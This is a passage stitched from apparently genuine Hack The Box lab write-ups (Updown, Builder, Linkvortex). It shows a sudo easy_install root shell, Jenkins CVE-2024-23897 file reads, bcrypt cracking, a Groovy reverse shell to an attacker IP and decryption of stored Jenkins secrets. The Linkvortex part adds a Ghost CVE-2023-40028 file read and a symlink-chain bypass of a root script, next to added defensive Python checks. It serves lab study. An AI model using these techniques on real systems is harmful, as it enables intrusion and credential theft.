10.10.11.177:45492. developer@updown:/home/developer/dev$ whoami whoami developer developer@updown:/home/developer/dev$ cd .. developer@updown:/home/developer$ ls -l .ssh ls -l .ssh total 12 -rw-rw-r-- 1 developer developer 572 Aug 2 2022 authorized_keys -rw------- 1 developer developer 2602 Aug 2 2022 id_rsa -rw-r--r-- 1 developer developer 572 Aug 2 2022 id_rsa.pub developer@updown:/home/developer$ cat .ssh/id_rsa cat .ssh/id_rsa -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn ........ 
3zga8EzubgwnpU7r9hN2jWboCCIOeDtvXFv08KT8pFDCCA+sMa5uoWQlBqmsOWCLvtaOWe N4jA+ppn1+3e0AAAASZGV2ZWxvcGVyQHNpdGVpc3VwAQ== -----END OPENSSH PRIVATE KEY-----\nWe find developer\u0026rsquo;s SSH private key, which lets us connect directly over SSH:\n$ vim developer.key $ chmod 600 developer.key $ ssh developer@10.10.11.177 -i developer.key Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-122-generic x86_64) .... Last login: Tue Aug 30 11:24:44 2022 from 10.10.14.36 developer@updown:~$ cat user.txt d235....edcf\ndeveloper -\u0026gt; root\neasy_install as root\ndeveloper@updown:~$ sudo -l Matching Defaults entries for developer on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User developer may run the following commands on localhost: (ALL) NOPASSWD: /usr/local/bin/easy_install\nOn GTFOBins, we find an exploitation path to become root:\nhttps://gtfobins.github.io/gtfobins/easy_install/\nTF=$(mktemp -d)\necho \u0026#34;import os; os.execl(\u0026#39;/bin/sh\u0026#39;, \u0026#39;sh\u0026#39;, \u0026#39;-c\u0026#39;, \u0026#39;sh \u0026lt;$(tty) \u0026gt;$(tty) 2\u0026gt;$(tty)\u0026#39;)\u0026#34; \u0026gt; $TF/setup.py\nsudo easy_install $TF\n------------------------\ndeveloper@updown:/tmp$ TF=$(mktemp -d) developer@updown:/tmp$ echo \u0026#34;import os; os.execl(\u0026#39;/bin/sh\u0026#39;, \u0026#39;sh\u0026#39;, \u0026#39;-c\u0026#39;, \u0026#39;sh \u0026lt;$(tty) \u0026gt;$(tty) 2\u0026gt;$(tty)\u0026#39;)\u0026#34; \u0026gt; $TF/setup.py developer@updown:/tmp$ sudo easy_install $TF WARNING: The easy_install command is deprecated and will be removed in a future version. 
    Processing tmp.hlSwiYYkel
    Writing /tmp/tmp.hlSwiYYkel/setup.cfg
    Running setup.py -q bdist_egg --dist-dir /tmp/tmp.hlSwiYYkel/egg-dist-tmp-KNZfWR
    # whoami
    root
    # cat /root/root.txt
    7077....3986

All it takes is a directory containing a setup.py that describes how our Python module should be installed. We put malicious code in that file and easy_install executes it as root when it processes the package: a setup.py is arbitrary code run by the installer, so any sudo rule on easy_install, pip install or python setup.py is a root shell.

Source: HTB | Updown, published 2025-10-30, https://leopoldabgn.github.io/writeups/p/updown-htb/

HTB | Builder

Machine name: Builder
OS: Linux (Ubuntu 22.04, per the SSH banner below)
IP: 10.10.11.10
Difficulty: Medium
Users: 1 - jennifer : princess

Enumeration

nmap

    $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.10
    PORT     STATE SERVICE REASON         VERSION
    22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
    |   256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
    8080/tcp open  http    syn-ack ttl 62 Jetty 10.0.18
    |_http-title: Dashboard [Jenkins]
    | http-robots.txt: 1 disallowed entry
    |_/
    |_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    | http-open-proxy: Potentially OPEN proxy.
    |_Methods supported:CONNECTION
    |_http-server-header: Jetty(10.0.18)

Foothold

Jenkins 2.441 - port 8080

Arbitrary file read - CVE-2024-23897

Jenkins 2.441 is affected by CVE-2024-23897, an arbitrary file read through the Jenkins CLI (often labelled an LFI in writeups): the CLI's argument parser expands an argument of the form @/path/to/file into the contents of that file, which then leak back through the error messages. Here it works without any credentials. A public exploit is available:
https://www.exploit-db.com/exploits/51993

    $ python3 exploit.py -u http://10.10.11.10:8080
    Press Ctrl+C to exit
    File to download:
    > /etc/hosts
    ff02::1	ip6-allnodes
    ff02::2	ip6-allrouters
    172.17.0.2	0f52c222a4cc
    ::1	localhost ip6-localhost ip6-loopback
    ff00::0	ip6-mcastprefix
    127.0.0.1	localhost
    fe00::0	ip6-localnet
    File to download:
    > /etc/passwd
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    root:x:0:0:root:/root:/bin/bash
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    _apt:x:42:65534::/nonexistent:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync

The exploit returns the lines of a file, but not in their original order, so each dump has to be read as a set of lines.

In /etc/hosts we find:

172.17.0.2	0f52c222a4cc

From the 172.x address and the hexadecimal hostname we conclude that Jenkins runs inside a Docker container (the nmap TTL of 62 on port 8080, one less than on port 22, points the same way: one extra hop).

In /etc/passwd we find the directory holding the Jenkins files:

jenkins:x:1000:1000::/var/jenkins_home:/bin/bash

Still using the file read, we try to fetch the
Jenkins configuration files in the hope of finding credentials:

/var/jenkins_home

Searching online, I learned that each user has a config.xml that most likely contains their password hash:

/var/lib/jenkins/users/jenkins_[udid]/config.xml

I also downloaded Jenkins 2.441 and installed it in a virtual machine so I could look at the file layout properly. On the Jenkins dashboard I found the user name "jennifer", which appears to be the administrator account.

Looking more closely at the files of my own Jenkins installation, I found /var/lib/jenkins/users/users.xml, which lists the users and maps each id to its directory. Dumping this file from the target gives jennifer's id and therefore her directory name:

jennifer_12108429903186576833

    > /var/jenkins_home/users/users.xml
    <?xml version='1.1' encoding='UTF-8'?>
    <string>jennifer_12108429903186576833</string>
    <idToDirectoryNameMap class="concurrent-hash-map">
    <entry>
    <string>jennifer</string>
    <version>1</version>
    </hudson.model.UserIdMapper>
    </idToDirectoryNameMap>
    <hudson.model.UserIdMapper>
    </entry>

(As with /etc/hosts the lines come back out of order; the <entry> pairs the id jennifer with the directory jennifer_12108429903186576833.)

Finally, I fetch jennifer's config.xml:

    File to download:
    > /var/jenkins_home/users/jennifer_12108429903186576833/config.xml
    ...
    <?xml version='1.1' encoding='UTF-8'?>
    <fullName>jennifer</fullName>
    <seed>6841d11dc1de101d</seed>
    <id>jennifer</id>
    <version>10</version>
    <tokenStore>
    <filterExecutors>false</filterExecutors>
    <io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>
    <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>

This gives jennifer's password hash. Jenkins stores it as the marker #jbcrypt: followed by a standard bcrypt string, so after stripping the prefix it can be attacked with hashcat mode 3200 (bcrypt) and the rockyou.txt wordlist:

    $ hashcat -m 3200 hash.txt ~/wordlists/rockyou.txt --show
    $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess

We now have jennifer's credentials, which give administrator access to the Jenkins web interface:

jennifer : princess

Jenkins reverse shell

The script console at http://10.10.11.10:8080/manage/script runs Groovy on the Jenkins controller, so a Java reverse shell can be pasted in directly (Groovy imports java.io and java.net by default):

    String host="10.10.14.11";
    int port=1337;
    String cmd="bash";
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s=new Socket(host,port);
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
    OutputStream po=p.getOutputStream(),so=s.getOutputStream();
    while(!s.isClosed()){
        while(pi.available()>0)so.write(pi.read());
        while(pe.available()>0)so.write(pe.read());
        while(si.available()>0)po.write(si.read());
        so.flush();po.flush();Thread.sleep(50);
        try{p.exitValue();break;}catch(Exception e){}
    };
    p.destroy();s.close();

    -------------------

    nc -lnvp 1337
    Ncat: Version 7.93 ( https://nmap.org/ncat )
    Ncat: Listening on :::1337
    Ncat: Listening on 0.0.0.0:1337
    Ncat: Connection from 10.10.11.10.
    Ncat: Connection from 10.10.11.10:34418.
    cat /var/jenkins_home/user.txt
    7712.....64b9

Privilege escalation

Root - SSH private key

https://devops.stackexchange.com/questions/2191/how-to-decrypt-jenkins-passwords-from-credentials-xml

We find a credentials.xml file containing an encrypted secret:

/var/jenkins_home/credentials.xml :

    <?xml version='1.1' encoding='UTF-8'?>
    ...
    <com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1319.v7eb_51b_3a_c97b_">
    <java.util.concurrent.CopyOnWriteArrayList>
    <privateKey>{AQAAABAAAAowLrfCrZx9baWliwrtC...........HaB1OTIcTxtaaMR8IMMaKSM=}</privateKey>
    </privateKeySource>
    <username>root</username>
    <usernameSecret>false</usernameSecret>
    </com.cloudbees.plugins.credentials.domains.Domain>
    ...

After some research, it turns out that the values in this file are passwords or SSH keys that Jenkins has encrypted with the instance's own secret key (kept under $JENKINS_HOME/secrets/), each associated with a user name.
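The three Jenkins files read above (users.xml, a user's config.xml and credentials.xml) can be triaged offline before going to the script console. The following Python is an added example, not the page's or Jenkins' own code: it pairs user ids with their directories even when the file-read returns lines out of order (Jenkins names the directory <id>_<number>), pulls the bcrypt string out of config.xml in the form hashcat -m 3200 expects, and inventories the encrypted values in credentials.xml. The sample inputs are constructed from the excerpts above; the credentials.xml blob is a dummy built in the layout Jenkins uses for its current secret format (one version byte 0x01, IV length and ciphertext length as big-endian int32, then IV and AES-128-CBC data). The key for that format is derived from secrets/master.key and secrets/hudson.util.Secret; decryption itself is left to the script console step below or to a crypto library.

```python
import base64
import re
import struct

# Constructed sample inputs modelled on the files read from the target.
# users.xml and config.xml lines are deliberately shuffled, as the
# CVE-2024-23897 file read returns them.
USERS_XML = """<?xml version='1.1' encoding='UTF-8'?>
<string>jennifer_12108429903186576833</string>
<idToDirectoryNameMap class="concurrent-hash-map">
<entry>
<string>jennifer</string>
<version>1</version>
</hudson.model.UserIdMapper>
</idToDirectoryNameMap>
<hudson.model.UserIdMapper>
</entry>"""

CONFIG_XML = """<?xml version='1.1' encoding='UTF-8'?>
<fullName>jennifer</fullName>
<seed>6841d11dc1de101d</seed>
<id>jennifer</id>
<passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>"""


def _fake_secret(iv, data):
    # Dummy Jenkins "payload v1" blob: 0x01, IV length, data length, IV, ciphertext
    # (ints are big-endian, as written by Java's DataOutputStream). Contents are filler.
    raw = b"\x01" + struct.pack(">ii", len(iv), len(data)) + iv + data
    return "{" + base64.b64encode(raw).decode() + "}"


CREDENTIALS_XML = f"""<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1319.v7eb_51b_3a_c97b_">
  <privateKey>{_fake_secret(b'A' * 16, b'B' * 48)}</privateKey>
  <username>root</username>
  <password>{base64.b64encode(b'C' * 32).decode()}</password>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>"""

STRING_RE = re.compile(r"<string>([^<]+)</string>")
HASH_RE = re.compile(r"<passwordHash>#jbcrypt:(\$2[aby]\$\d\d\$[./A-Za-z0-9]+)</passwordHash>")
SECRET_RE = re.compile(r"<(privateKey|password|secret|passphrase)>([^<]+)</\1>")


def user_directories(users_xml):
    """Map user ids to their directory under users/, tolerating shuffled lines:
    the directory is named <id>_<number>, so pair each <string> value that has
    another <string> value as its prefix."""
    values = STRING_RE.findall(users_xml)
    dirs = {}
    for v in values:
        m = re.fullmatch(r"(.+)_(\d+)", v)
        if m and m.group(1) in values:
            dirs[m.group(1)] = v
    return dirs


def bcrypt_hashes(config_xml):
    """Return the bcrypt strings from a user's config.xml, ready for hashcat -m 3200
    (the '#jbcrypt:' prefix is Jenkins' own marker and must be stripped)."""
    return HASH_RE.findall(config_xml)


def encrypted_secrets(credentials_xml):
    """Inventory encrypted values in credentials.xml and describe their format.
    '{base64}' is the current format (version byte, IV length, data length, IV,
    AES-128-CBC ciphertext); a bare base64 string is the legacy AES-128-ECB format."""
    out = []
    for tag, value in SECRET_RE.findall(credentials_xml):
        if value.startswith("{") and value.endswith("}"):
            raw = base64.b64decode(value[1:-1])
            iv_len, data_len = struct.unpack(">ii", raw[1:9])
            out.append({"tag": tag, "format": "v1-cbc", "version": raw[0],
                        "iv_len": iv_len, "data_len": data_len,
                        "consistent": len(raw) == 9 + iv_len + data_len})
        else:
            out.append({"tag": tag, "format": "legacy-ecb",
                        "len": len(base64.b64decode(value))})
    return out


if __name__ == "__main__":
    print(user_directories(USERS_XML))
    print(bcrypt_hashes(CONFIG_XML))
    for s in encrypted_secrets(CREDENTIALS_XML):
        print(s)
```

The "consistent" flag is a cheap sanity check that a blob copied out of a file-read dump was not truncated (the two length fields must account for every byte after the header); a blob that fails it will not decrypt no matter which key is used.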
In the Jenkins GUI, an SSH key appears to be stored for a user named root.

An online forum explains that the secret inside the <privateKey> tag of credentials.xml can be decrypted from the script console available in the GUI, since the running instance holds the key: http://10.10.11.10:8080/script

Running the following is enough:

    println(hudson.util.Secret.decrypt("{PRIVATE_KEY}"))

Which here gives:

    println(hudson.util.Secret.decrypt("{AQAAABAAAAo…IcTxtaaMR8IMMaKSM=}"))

The script's output is an SSH private key.

SSH as root

With that SSH key we log in directly as root:

    $ vim root.key
    $ chmod 600 root.key
    $ ssh root@10.10.11.10 -i root.key
    Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64)
    ...
    Last login: Mon Feb 12 13:15:44 2024 from 10.10.14.40
    root@builder:~# ls
    root.txt
    root@builder:~# cat root.txt
    a9aa.....0396

Source: HTB | Builder, published 2025-10-25, https://leopoldabgn.github.io/writeups/p/builder-htb/

HTB | Linkvortex

Machine name: Linkvortex
OS: Linux
IP: 10.10.11.47
Difficulty: Easy
Users:

    # Ghost application
    admin@linkvortex.htb : OctopiFociPilfer45
    # SSH
    bob : fibber-talented-worth

Enumeration

nmap

    $ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.47
    PORT   STATE SERVICE REASON         VERSION
    22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   256 3ef8b968c8eb570fcb0b47b9865083eb (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=
    |   256 a2ea6ee1b6d7e7c58669ceba059e3813 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz
    80/tcp open  http    syn-ack ttl 63 Apache httpd
    |_http-title: Did not follow redirect to http://linkvortex.htb/
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache

Foothold

linkvortex.htb - Ghost 5.58

Port 80 redirects to http://linkvortex.htb. Wappalyzer identifies Ghost CMS version 5.58.

Subdomain enumeration - dev

dev.linkvortex.htb

    $ gobuster vhost -u "linkvortex.htb" -w `fzf-wordlists` --append-domain
    ===============================================================
    Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:             http://linkvortex.htb
    [+] Method:          GET
    [+] Threads:         10
    [+] Wordlist:        /opt/lists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
    [+] User Agent:      gobuster/3.6
    [+] Timeout:         10s
    [+] Append Domain:
    true
    ===============================================================
    Starting gobuster in VHOST enumeration mode
    ===============================================================
    Found: dev.linkvortex.htb Status: 200 [Size: 2538]

    $ cat /etc/hosts
    10.10.11.47 linkvortex.htb dev.linkvortex.htb

.git

The dev vhost exposes a .git directory, so we can retrieve the whole repository and analyse it with git-dumper:

    $ dirsearch -u http://dev.linkvortex.htb
    Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
    Target: http://dev.linkvortex.htb/
    [17:09:04] Scanning:
    [17:09:04] 301 -  239B  - /.git  ->  http://dev.linkvortex.htb/.git/
    ...

git-dumper - password found

Dump the .git contents with git-dumper:

    $ git-dumper http://dev.linkvortex.htb/.git ./git-d
    [-] Testing http://dev.linkvortex.htb/.git/HEAD [200]
    [-] Testing http://dev.linkvortex.htb/.git/ [200]
    [-] Fetching .git recursively
    [-] Fetching http://dev.linkvortex.htb/.gitignore [404]
    [-] http://dev.linkvortex.htb/.gitignore responded with status code 404
    ...
    [-] Fetching http://dev.linkvortex.htb/.git/objects/50/864e0261278525197724b394ed4292414d9fec [200]
    [-] Sanitizing .git/config
    [-] Running git checkout .
    Updated 5596 paths from the index

I cloned the genuine Ghost 5.58 release and diffed it against the dumped repository:

    $ wget https://github.com/TryGhost/Ghost/archive/refs/tags/v5.58.0.zip
    $ unzip v5.58.0.zip
    $ diff -r ./Ghost-5.58.0 ./git-dump
    Only in ./git-dump: Dockerfile.ghost
    diff --color -r ./Ghost-5.58.0/ghost/core/test/regression/api/admin/authentication.test.js ./git-dump/ghost/core/test/regression/api/admin/authentication.test.js
    56c56
    <         const password = 'thisissupersafe';
    ---
    >         const password = 'OctopiFociPilfer45';
    Only in ./git-dump: .git

password : OctopiFociPilfer45

Diffing against the upstream release is a quick way to isolate local changes: the only modified source file is a test fixture whose placeholder password was replaced with a real one.

Ghost dashboard

The Ghost login page gives access to the dashboard:

http://linkvortex.htb/ghost

As an educated guess we try this e-mail address:

admin@linkvortex.htb

Credentials:

    admin@linkvortex.htb
    OctopiFociPilfer45

Ghost arbitrary file read exploit

Researching Ghost 5.58 turns up CVE-2023-40028, which lets an authenticated administrator read any file on the machine:

https://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028

Using the CVE we read several files. In /etc/passwd only the user "node" seems to have a home directory, which is surprising. Then /etc/hosts contains:

172.20.0.2	484b975c6616

On checking, Docker containers usually get an address in 172.x.x.x.
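The writeup does not describe the mechanism behind CVE-2023-40028, which is worth knowing when reading the exploit script linked above: Ghost 5.58 did not reject symbolic links inside an uploaded theme archive, so a zip containing a link member pointing at, say, /etc/passwd exposed that file through the extracted theme (fixed in later releases). The following Python is an added example, not code from the page, from Ghost or from the exploit repository: it builds such an archive in memory, the way a zip stores a symlink (a Unix mode with S_IFLNK in the entry's external attributes and the link target as the entry data), and shows the extraction-side check that rejects symlink and path-traversal members. The theme content and file names are made up for the demonstration.

```python
import io
import os
import stat
import zipfile

# Unix mode stored in the zip entry for a symbolic link (0o120777)
SYMLINK_MODE = stat.S_IFLNK | 0o777


def build_theme(members):
    """Build a minimal Ghost-style theme zip in memory.
    members: iterable of (name, data, is_symlink). For a symlink member the
    data is the link target, exactly as Info-ZIP and tar-to-zip tools store it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("package.json", '{"name": "demo-theme", "version": "1.0.0"}')
        for name, data, is_symlink in members:
            zi = zipfile.ZipInfo(name)
            zi.create_system = 3  # "Unix", so extractors honour the mode bits below
            zi.external_attr = (SYMLINK_MODE if is_symlink else 0o644) << 16
            zf.writestr(zi, data)
    return buf.getvalue()


def unsafe_members(zip_bytes):
    """Defensive check to run before extracting an uploaded archive:
    report members that are symbolic links or that escape the archive root."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for zi in zf.infolist():
            mode = zi.external_attr >> 16
            if stat.S_ISLNK(mode):
                problems.append((zi.filename, "symlink -> " + zf.read(zi).decode()))
            elif os.path.isabs(zi.filename) or ".." in zi.filename.split("/"):
                problems.append((zi.filename, "path traversal"))
    return problems


if __name__ == "__main__":
    evil = build_theme([("assets/passwd", "/etc/passwd", True)])
    print(unsafe_members(evil))                 # the symlink member is reported
    clean = build_theme([("assets/style.css", "body{}", False)])
    print(unsafe_members(clean))                # nothing to report
```

Once extracted by an extractor that recreates symlinks, assets/passwd would be a link to /etc/passwd inside the theme directory, and anything that serves or reads theme files follows it; refusing archives with S_IFLNK members (or extracting with a tool that never recreates links) closes the primitive.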
The hexadecimal hostname also points to a Docker container.

We also know the application runs on Node.js, and the official Ghost Docker image installs it under /var/lib/ghost, i.e.:

/var/lib/[App]

    $ ./exploit.sh -u admin@linkvortex.htb -p 'OctopiFociPilfer45' -h http://linkvortex.htb
    WELCOME TO THE CVE-2023-40028 SHELL
    Enter the file path to read (or type 'exit' to quit): /etc/hosts
    File content:
    127.0.0.1	localhost
    ::1	localhost ip6-localhost ip6-loopback
    fe00::0	ip6-localnet
    ff00::0	ip6-mcastprefix
    ff02::1	ip6-allnodes
    ff02::2	ip6-allrouters
    172.20.0.2	484b975c6616

By deduction we therefore fetch the Ghost configuration file:

/var/lib/ghost/config.production.json

It contains credentials that appear to be for an SMTP mail server:

bob@linkvortex.htb
fibber-talented-worth

    Enter the file path to read (or type 'exit' to quit): /var/lib/ghost/config.production.json
    File content:
    {
      "url": "http://localhost:2368",
      "server": {
        "port": 2368,
        "host": "::"
      },
      ...
      "mail": {
        "transport": "SMTP",
        "options": {
          "service": "Google",
          "host": "linkvortex.htb",
          "port": 587,
          "auth": {
            "user": "bob@linkvortex.htb",
            "pass": "fibber-talented-worth"
          }
        }
      }
    }

SSH to bob

The SMTP password is reused for bob's system account, so we can log in over SSH as bob:

    $ ssh bob@10.10.11.47
    bob@10.10.11.47's password:    # <<<< fibber-talented-worth
    Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)

     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/pro

    This system has been minimized by removing packages and content that are
    not required on a system that users do not log into.

    To restore this content, you can run the 'unminimize' command.
    Last login: Tue Dec  3 11:41:50 2024 from 10.10.14.62
    -bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
    bob@linkvortex:~$ cat user.txt
    80f2.....24bb

Privilege escalation

Enumeration

    bob@linkvortex:~$ sudo -l
    Matching Defaults entries for bob on linkvortex:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_keep+=CHECK_CONTENT

    User bob may run the following commands on linkvortex:
        (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

clean_symlink.sh as root

We can run this script as root, passing it a file with the ".png" extension. Note the env_keep+=CHECK_CONTENT entry as well: sudo passes that variable through from our environment, and the script uses it to decide whether to print the quarantined file. /opt/ghost/clean_symlink.sh:

    #!/bin/bash

    QUAR_DIR="/var/quarantined"

    if [ -z $CHECK_CONTENT ];then
      CHECK_CONTENT=false
    fi

    LINK=$1

    if ! [[ "$LINK" =~ \.png$ ]]; then
      /usr/bin/echo "! First argument must be a png file !"
      exit 2
    fi

    if /usr/bin/sudo /usr/bin/test -L $LINK;then
      LINK_NAME=$(/usr/bin/basename $LINK)
      LINK_TARGET=$(/usr/bin/readlink $LINK)
      if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
        /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
        /usr/bin/unlink $LINK
      else
        /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
        /usr/bin/mv $LINK $QUAR_DIR/
        if $CHECK_CONTENT;then
          /usr/bin/echo "Content:"
          /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
        fi
      fi
    fi

First attempt:

Create a symlink n00b.png pointing to /root/root.txt and run the script.

ERROR: "! Trying to read critical files, removing link [ n00b.png ] !"

The script uses readlink to check where our symlink points.
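To see exactly what a readlink-plus-grep filter does and does not catch, here is an added Python example (not part of the writeup, and not the script's own code) that models the script's check next to a hardened one and runs both against the same link layout built in a temporary directory: a link straight at a file under a directory named root, and a two-link chain whose first hop is a harmless relative name. os.readlink returns one level, like readlink(1); os.path.realpath resolves the whole chain, like readlink -f. The directory and file names are stand-ins for /root/root.txt and /var/quarantined.

```python
import os
import re
import tempfile

# The script's filter: grep -E '(etc|root)' on whatever readlink prints.
CRITICAL = re.compile(r"(etc|root)")


def check_one_level(link):
    """Model of clean_symlink.sh: inspect only the immediate target of the link
    and allow it unless that string contains 'etc' or 'root'."""
    return CRITICAL.search(os.readlink(link)) is None


def check_fully_resolved(link, allowed_root):
    """Hardened check: resolve the whole chain (realpath, like readlink -f) and
    require the final file to live under an explicit allow-list directory.
    A substring match on the path is not a boundary; a directory prefix is."""
    final = os.path.realpath(link)
    root = os.path.realpath(allowed_root)
    return os.path.commonpath([final, root]) == root


def demo():
    """Build the link layout in a temp dir and return what each check decides."""
    base = tempfile.mkdtemp()
    secret_dir = os.path.join(base, "root")            # stands in for /root
    os.mkdir(secret_dir)
    secret = os.path.join(secret_dir, "root.txt")
    with open(secret, "w") as f:
        f.write("flag\n")
    work = os.path.join(base, "quarantined")           # stands in for /var/quarantined
    os.mkdir(work)
    with open(os.path.join(work, "legit.txt"), "w") as f:
        f.write("ok\n")

    direct = os.path.join(work, "n00b.png")
    os.symlink(secret, direct)                          # first attempt: straight at root.txt
    middle = os.path.join(work, "n00b")
    os.symlink(secret, middle)
    chained = os.path.join(work, "exploit.png")
    os.symlink("n00b", chained)                         # relative link to the middle link
    legit = os.path.join(work, "ok.png")
    os.symlink("legit.txt", legit)                      # a link that should be allowed

    with open(chained) as f:                            # cat follows the whole chain
        content = f.read()
    return {
        "direct_one_level": check_one_level(direct),
        "chained_one_level": check_one_level(chained),
        "chained_resolved": check_fully_resolved(chained, work),
        "legit_resolved": check_fully_resolved(legit, work),
        "chained_read": content,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=", repr(v))
```

The one-level check rejects the direct link but passes the chained one, whose target string is just "n00b", while cat on that same link reads the protected file. Resolving the full path and comparing it against an allowed directory rejects the chain and still accepts the legitimate link.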
If the target path contains "etc" or "root", the script refuses to read it.

To bypass this check it is enough to create two symlinks:

1st symlink: n00b points to /root/root.txt
2nd symlink: exploit.png points to n00b

readlink resolves only one level: when the script checks where exploit.png points it sees "n00b", which matches neither pattern, so the read is allowed. Since n00b itself points to root.txt, cat follows the whole chain and the file is printed:

    bob@linkvortex:/var/quarantined$ ln -s /root/root.txt n00b
    bob@linkvortex:/var/quarantined$ ls
    n00b
    bob@linkvortex:/var/quarantined$ ln -s n00b exploit.png
    bob@linkvortex:/var/quarantined$ ls
    exploit.png  n00b
    bob@linkvortex:/var/quarantined$ ls -lah
    total 8.0K
    drwxr-xr-x  2 bob  bob  4.0K Oct 22 22:46 .
    drwxr-xr-x 14 root root 4.0K Nov 29  2024 ..
    lrwxrwxrwx  1 bob  bob     4 Oct 22 22:46 exploit.png -> n00b
    lrwxrwxrwx  1 bob  bob    14 Oct 22 22:45 n00b -> /root/root.txt
    bob@linkvortex:/var/quarantined$ cat n00b
    cat: n00b: Permission denied
    bob@linkvortex:/var/quarantined$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh exploit.png
    Link found [ exploit.png ] , moving it to quarantine
    /usr/bin/mv: 'exploit.png' and '/var/quarantined/exploit.png' are the same file
    Content:
    5f3e.....aebc9

Two details make this work: we operate directly inside /var/quarantined, so the mv is a no-op (hence the "same file" message) and the link is still there for the cat that follows; and CHECK_CONTENT must be set to true in bob's environment (export CHECK_CONTENT=true) for the "Content:" branch to run at all, which sudo allows through thanks to env_keep.

Root shell

We use the same trick to read root's SSH private key and log in over SSH:

    bob@linkvortex:/var/quarantined$ ln -s /root/.ssh/id_rsa n00b
    bob@linkvortex:/var/quarantined$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh exploit.png
    Link found [ exploit.png ] , moving it to quarantine
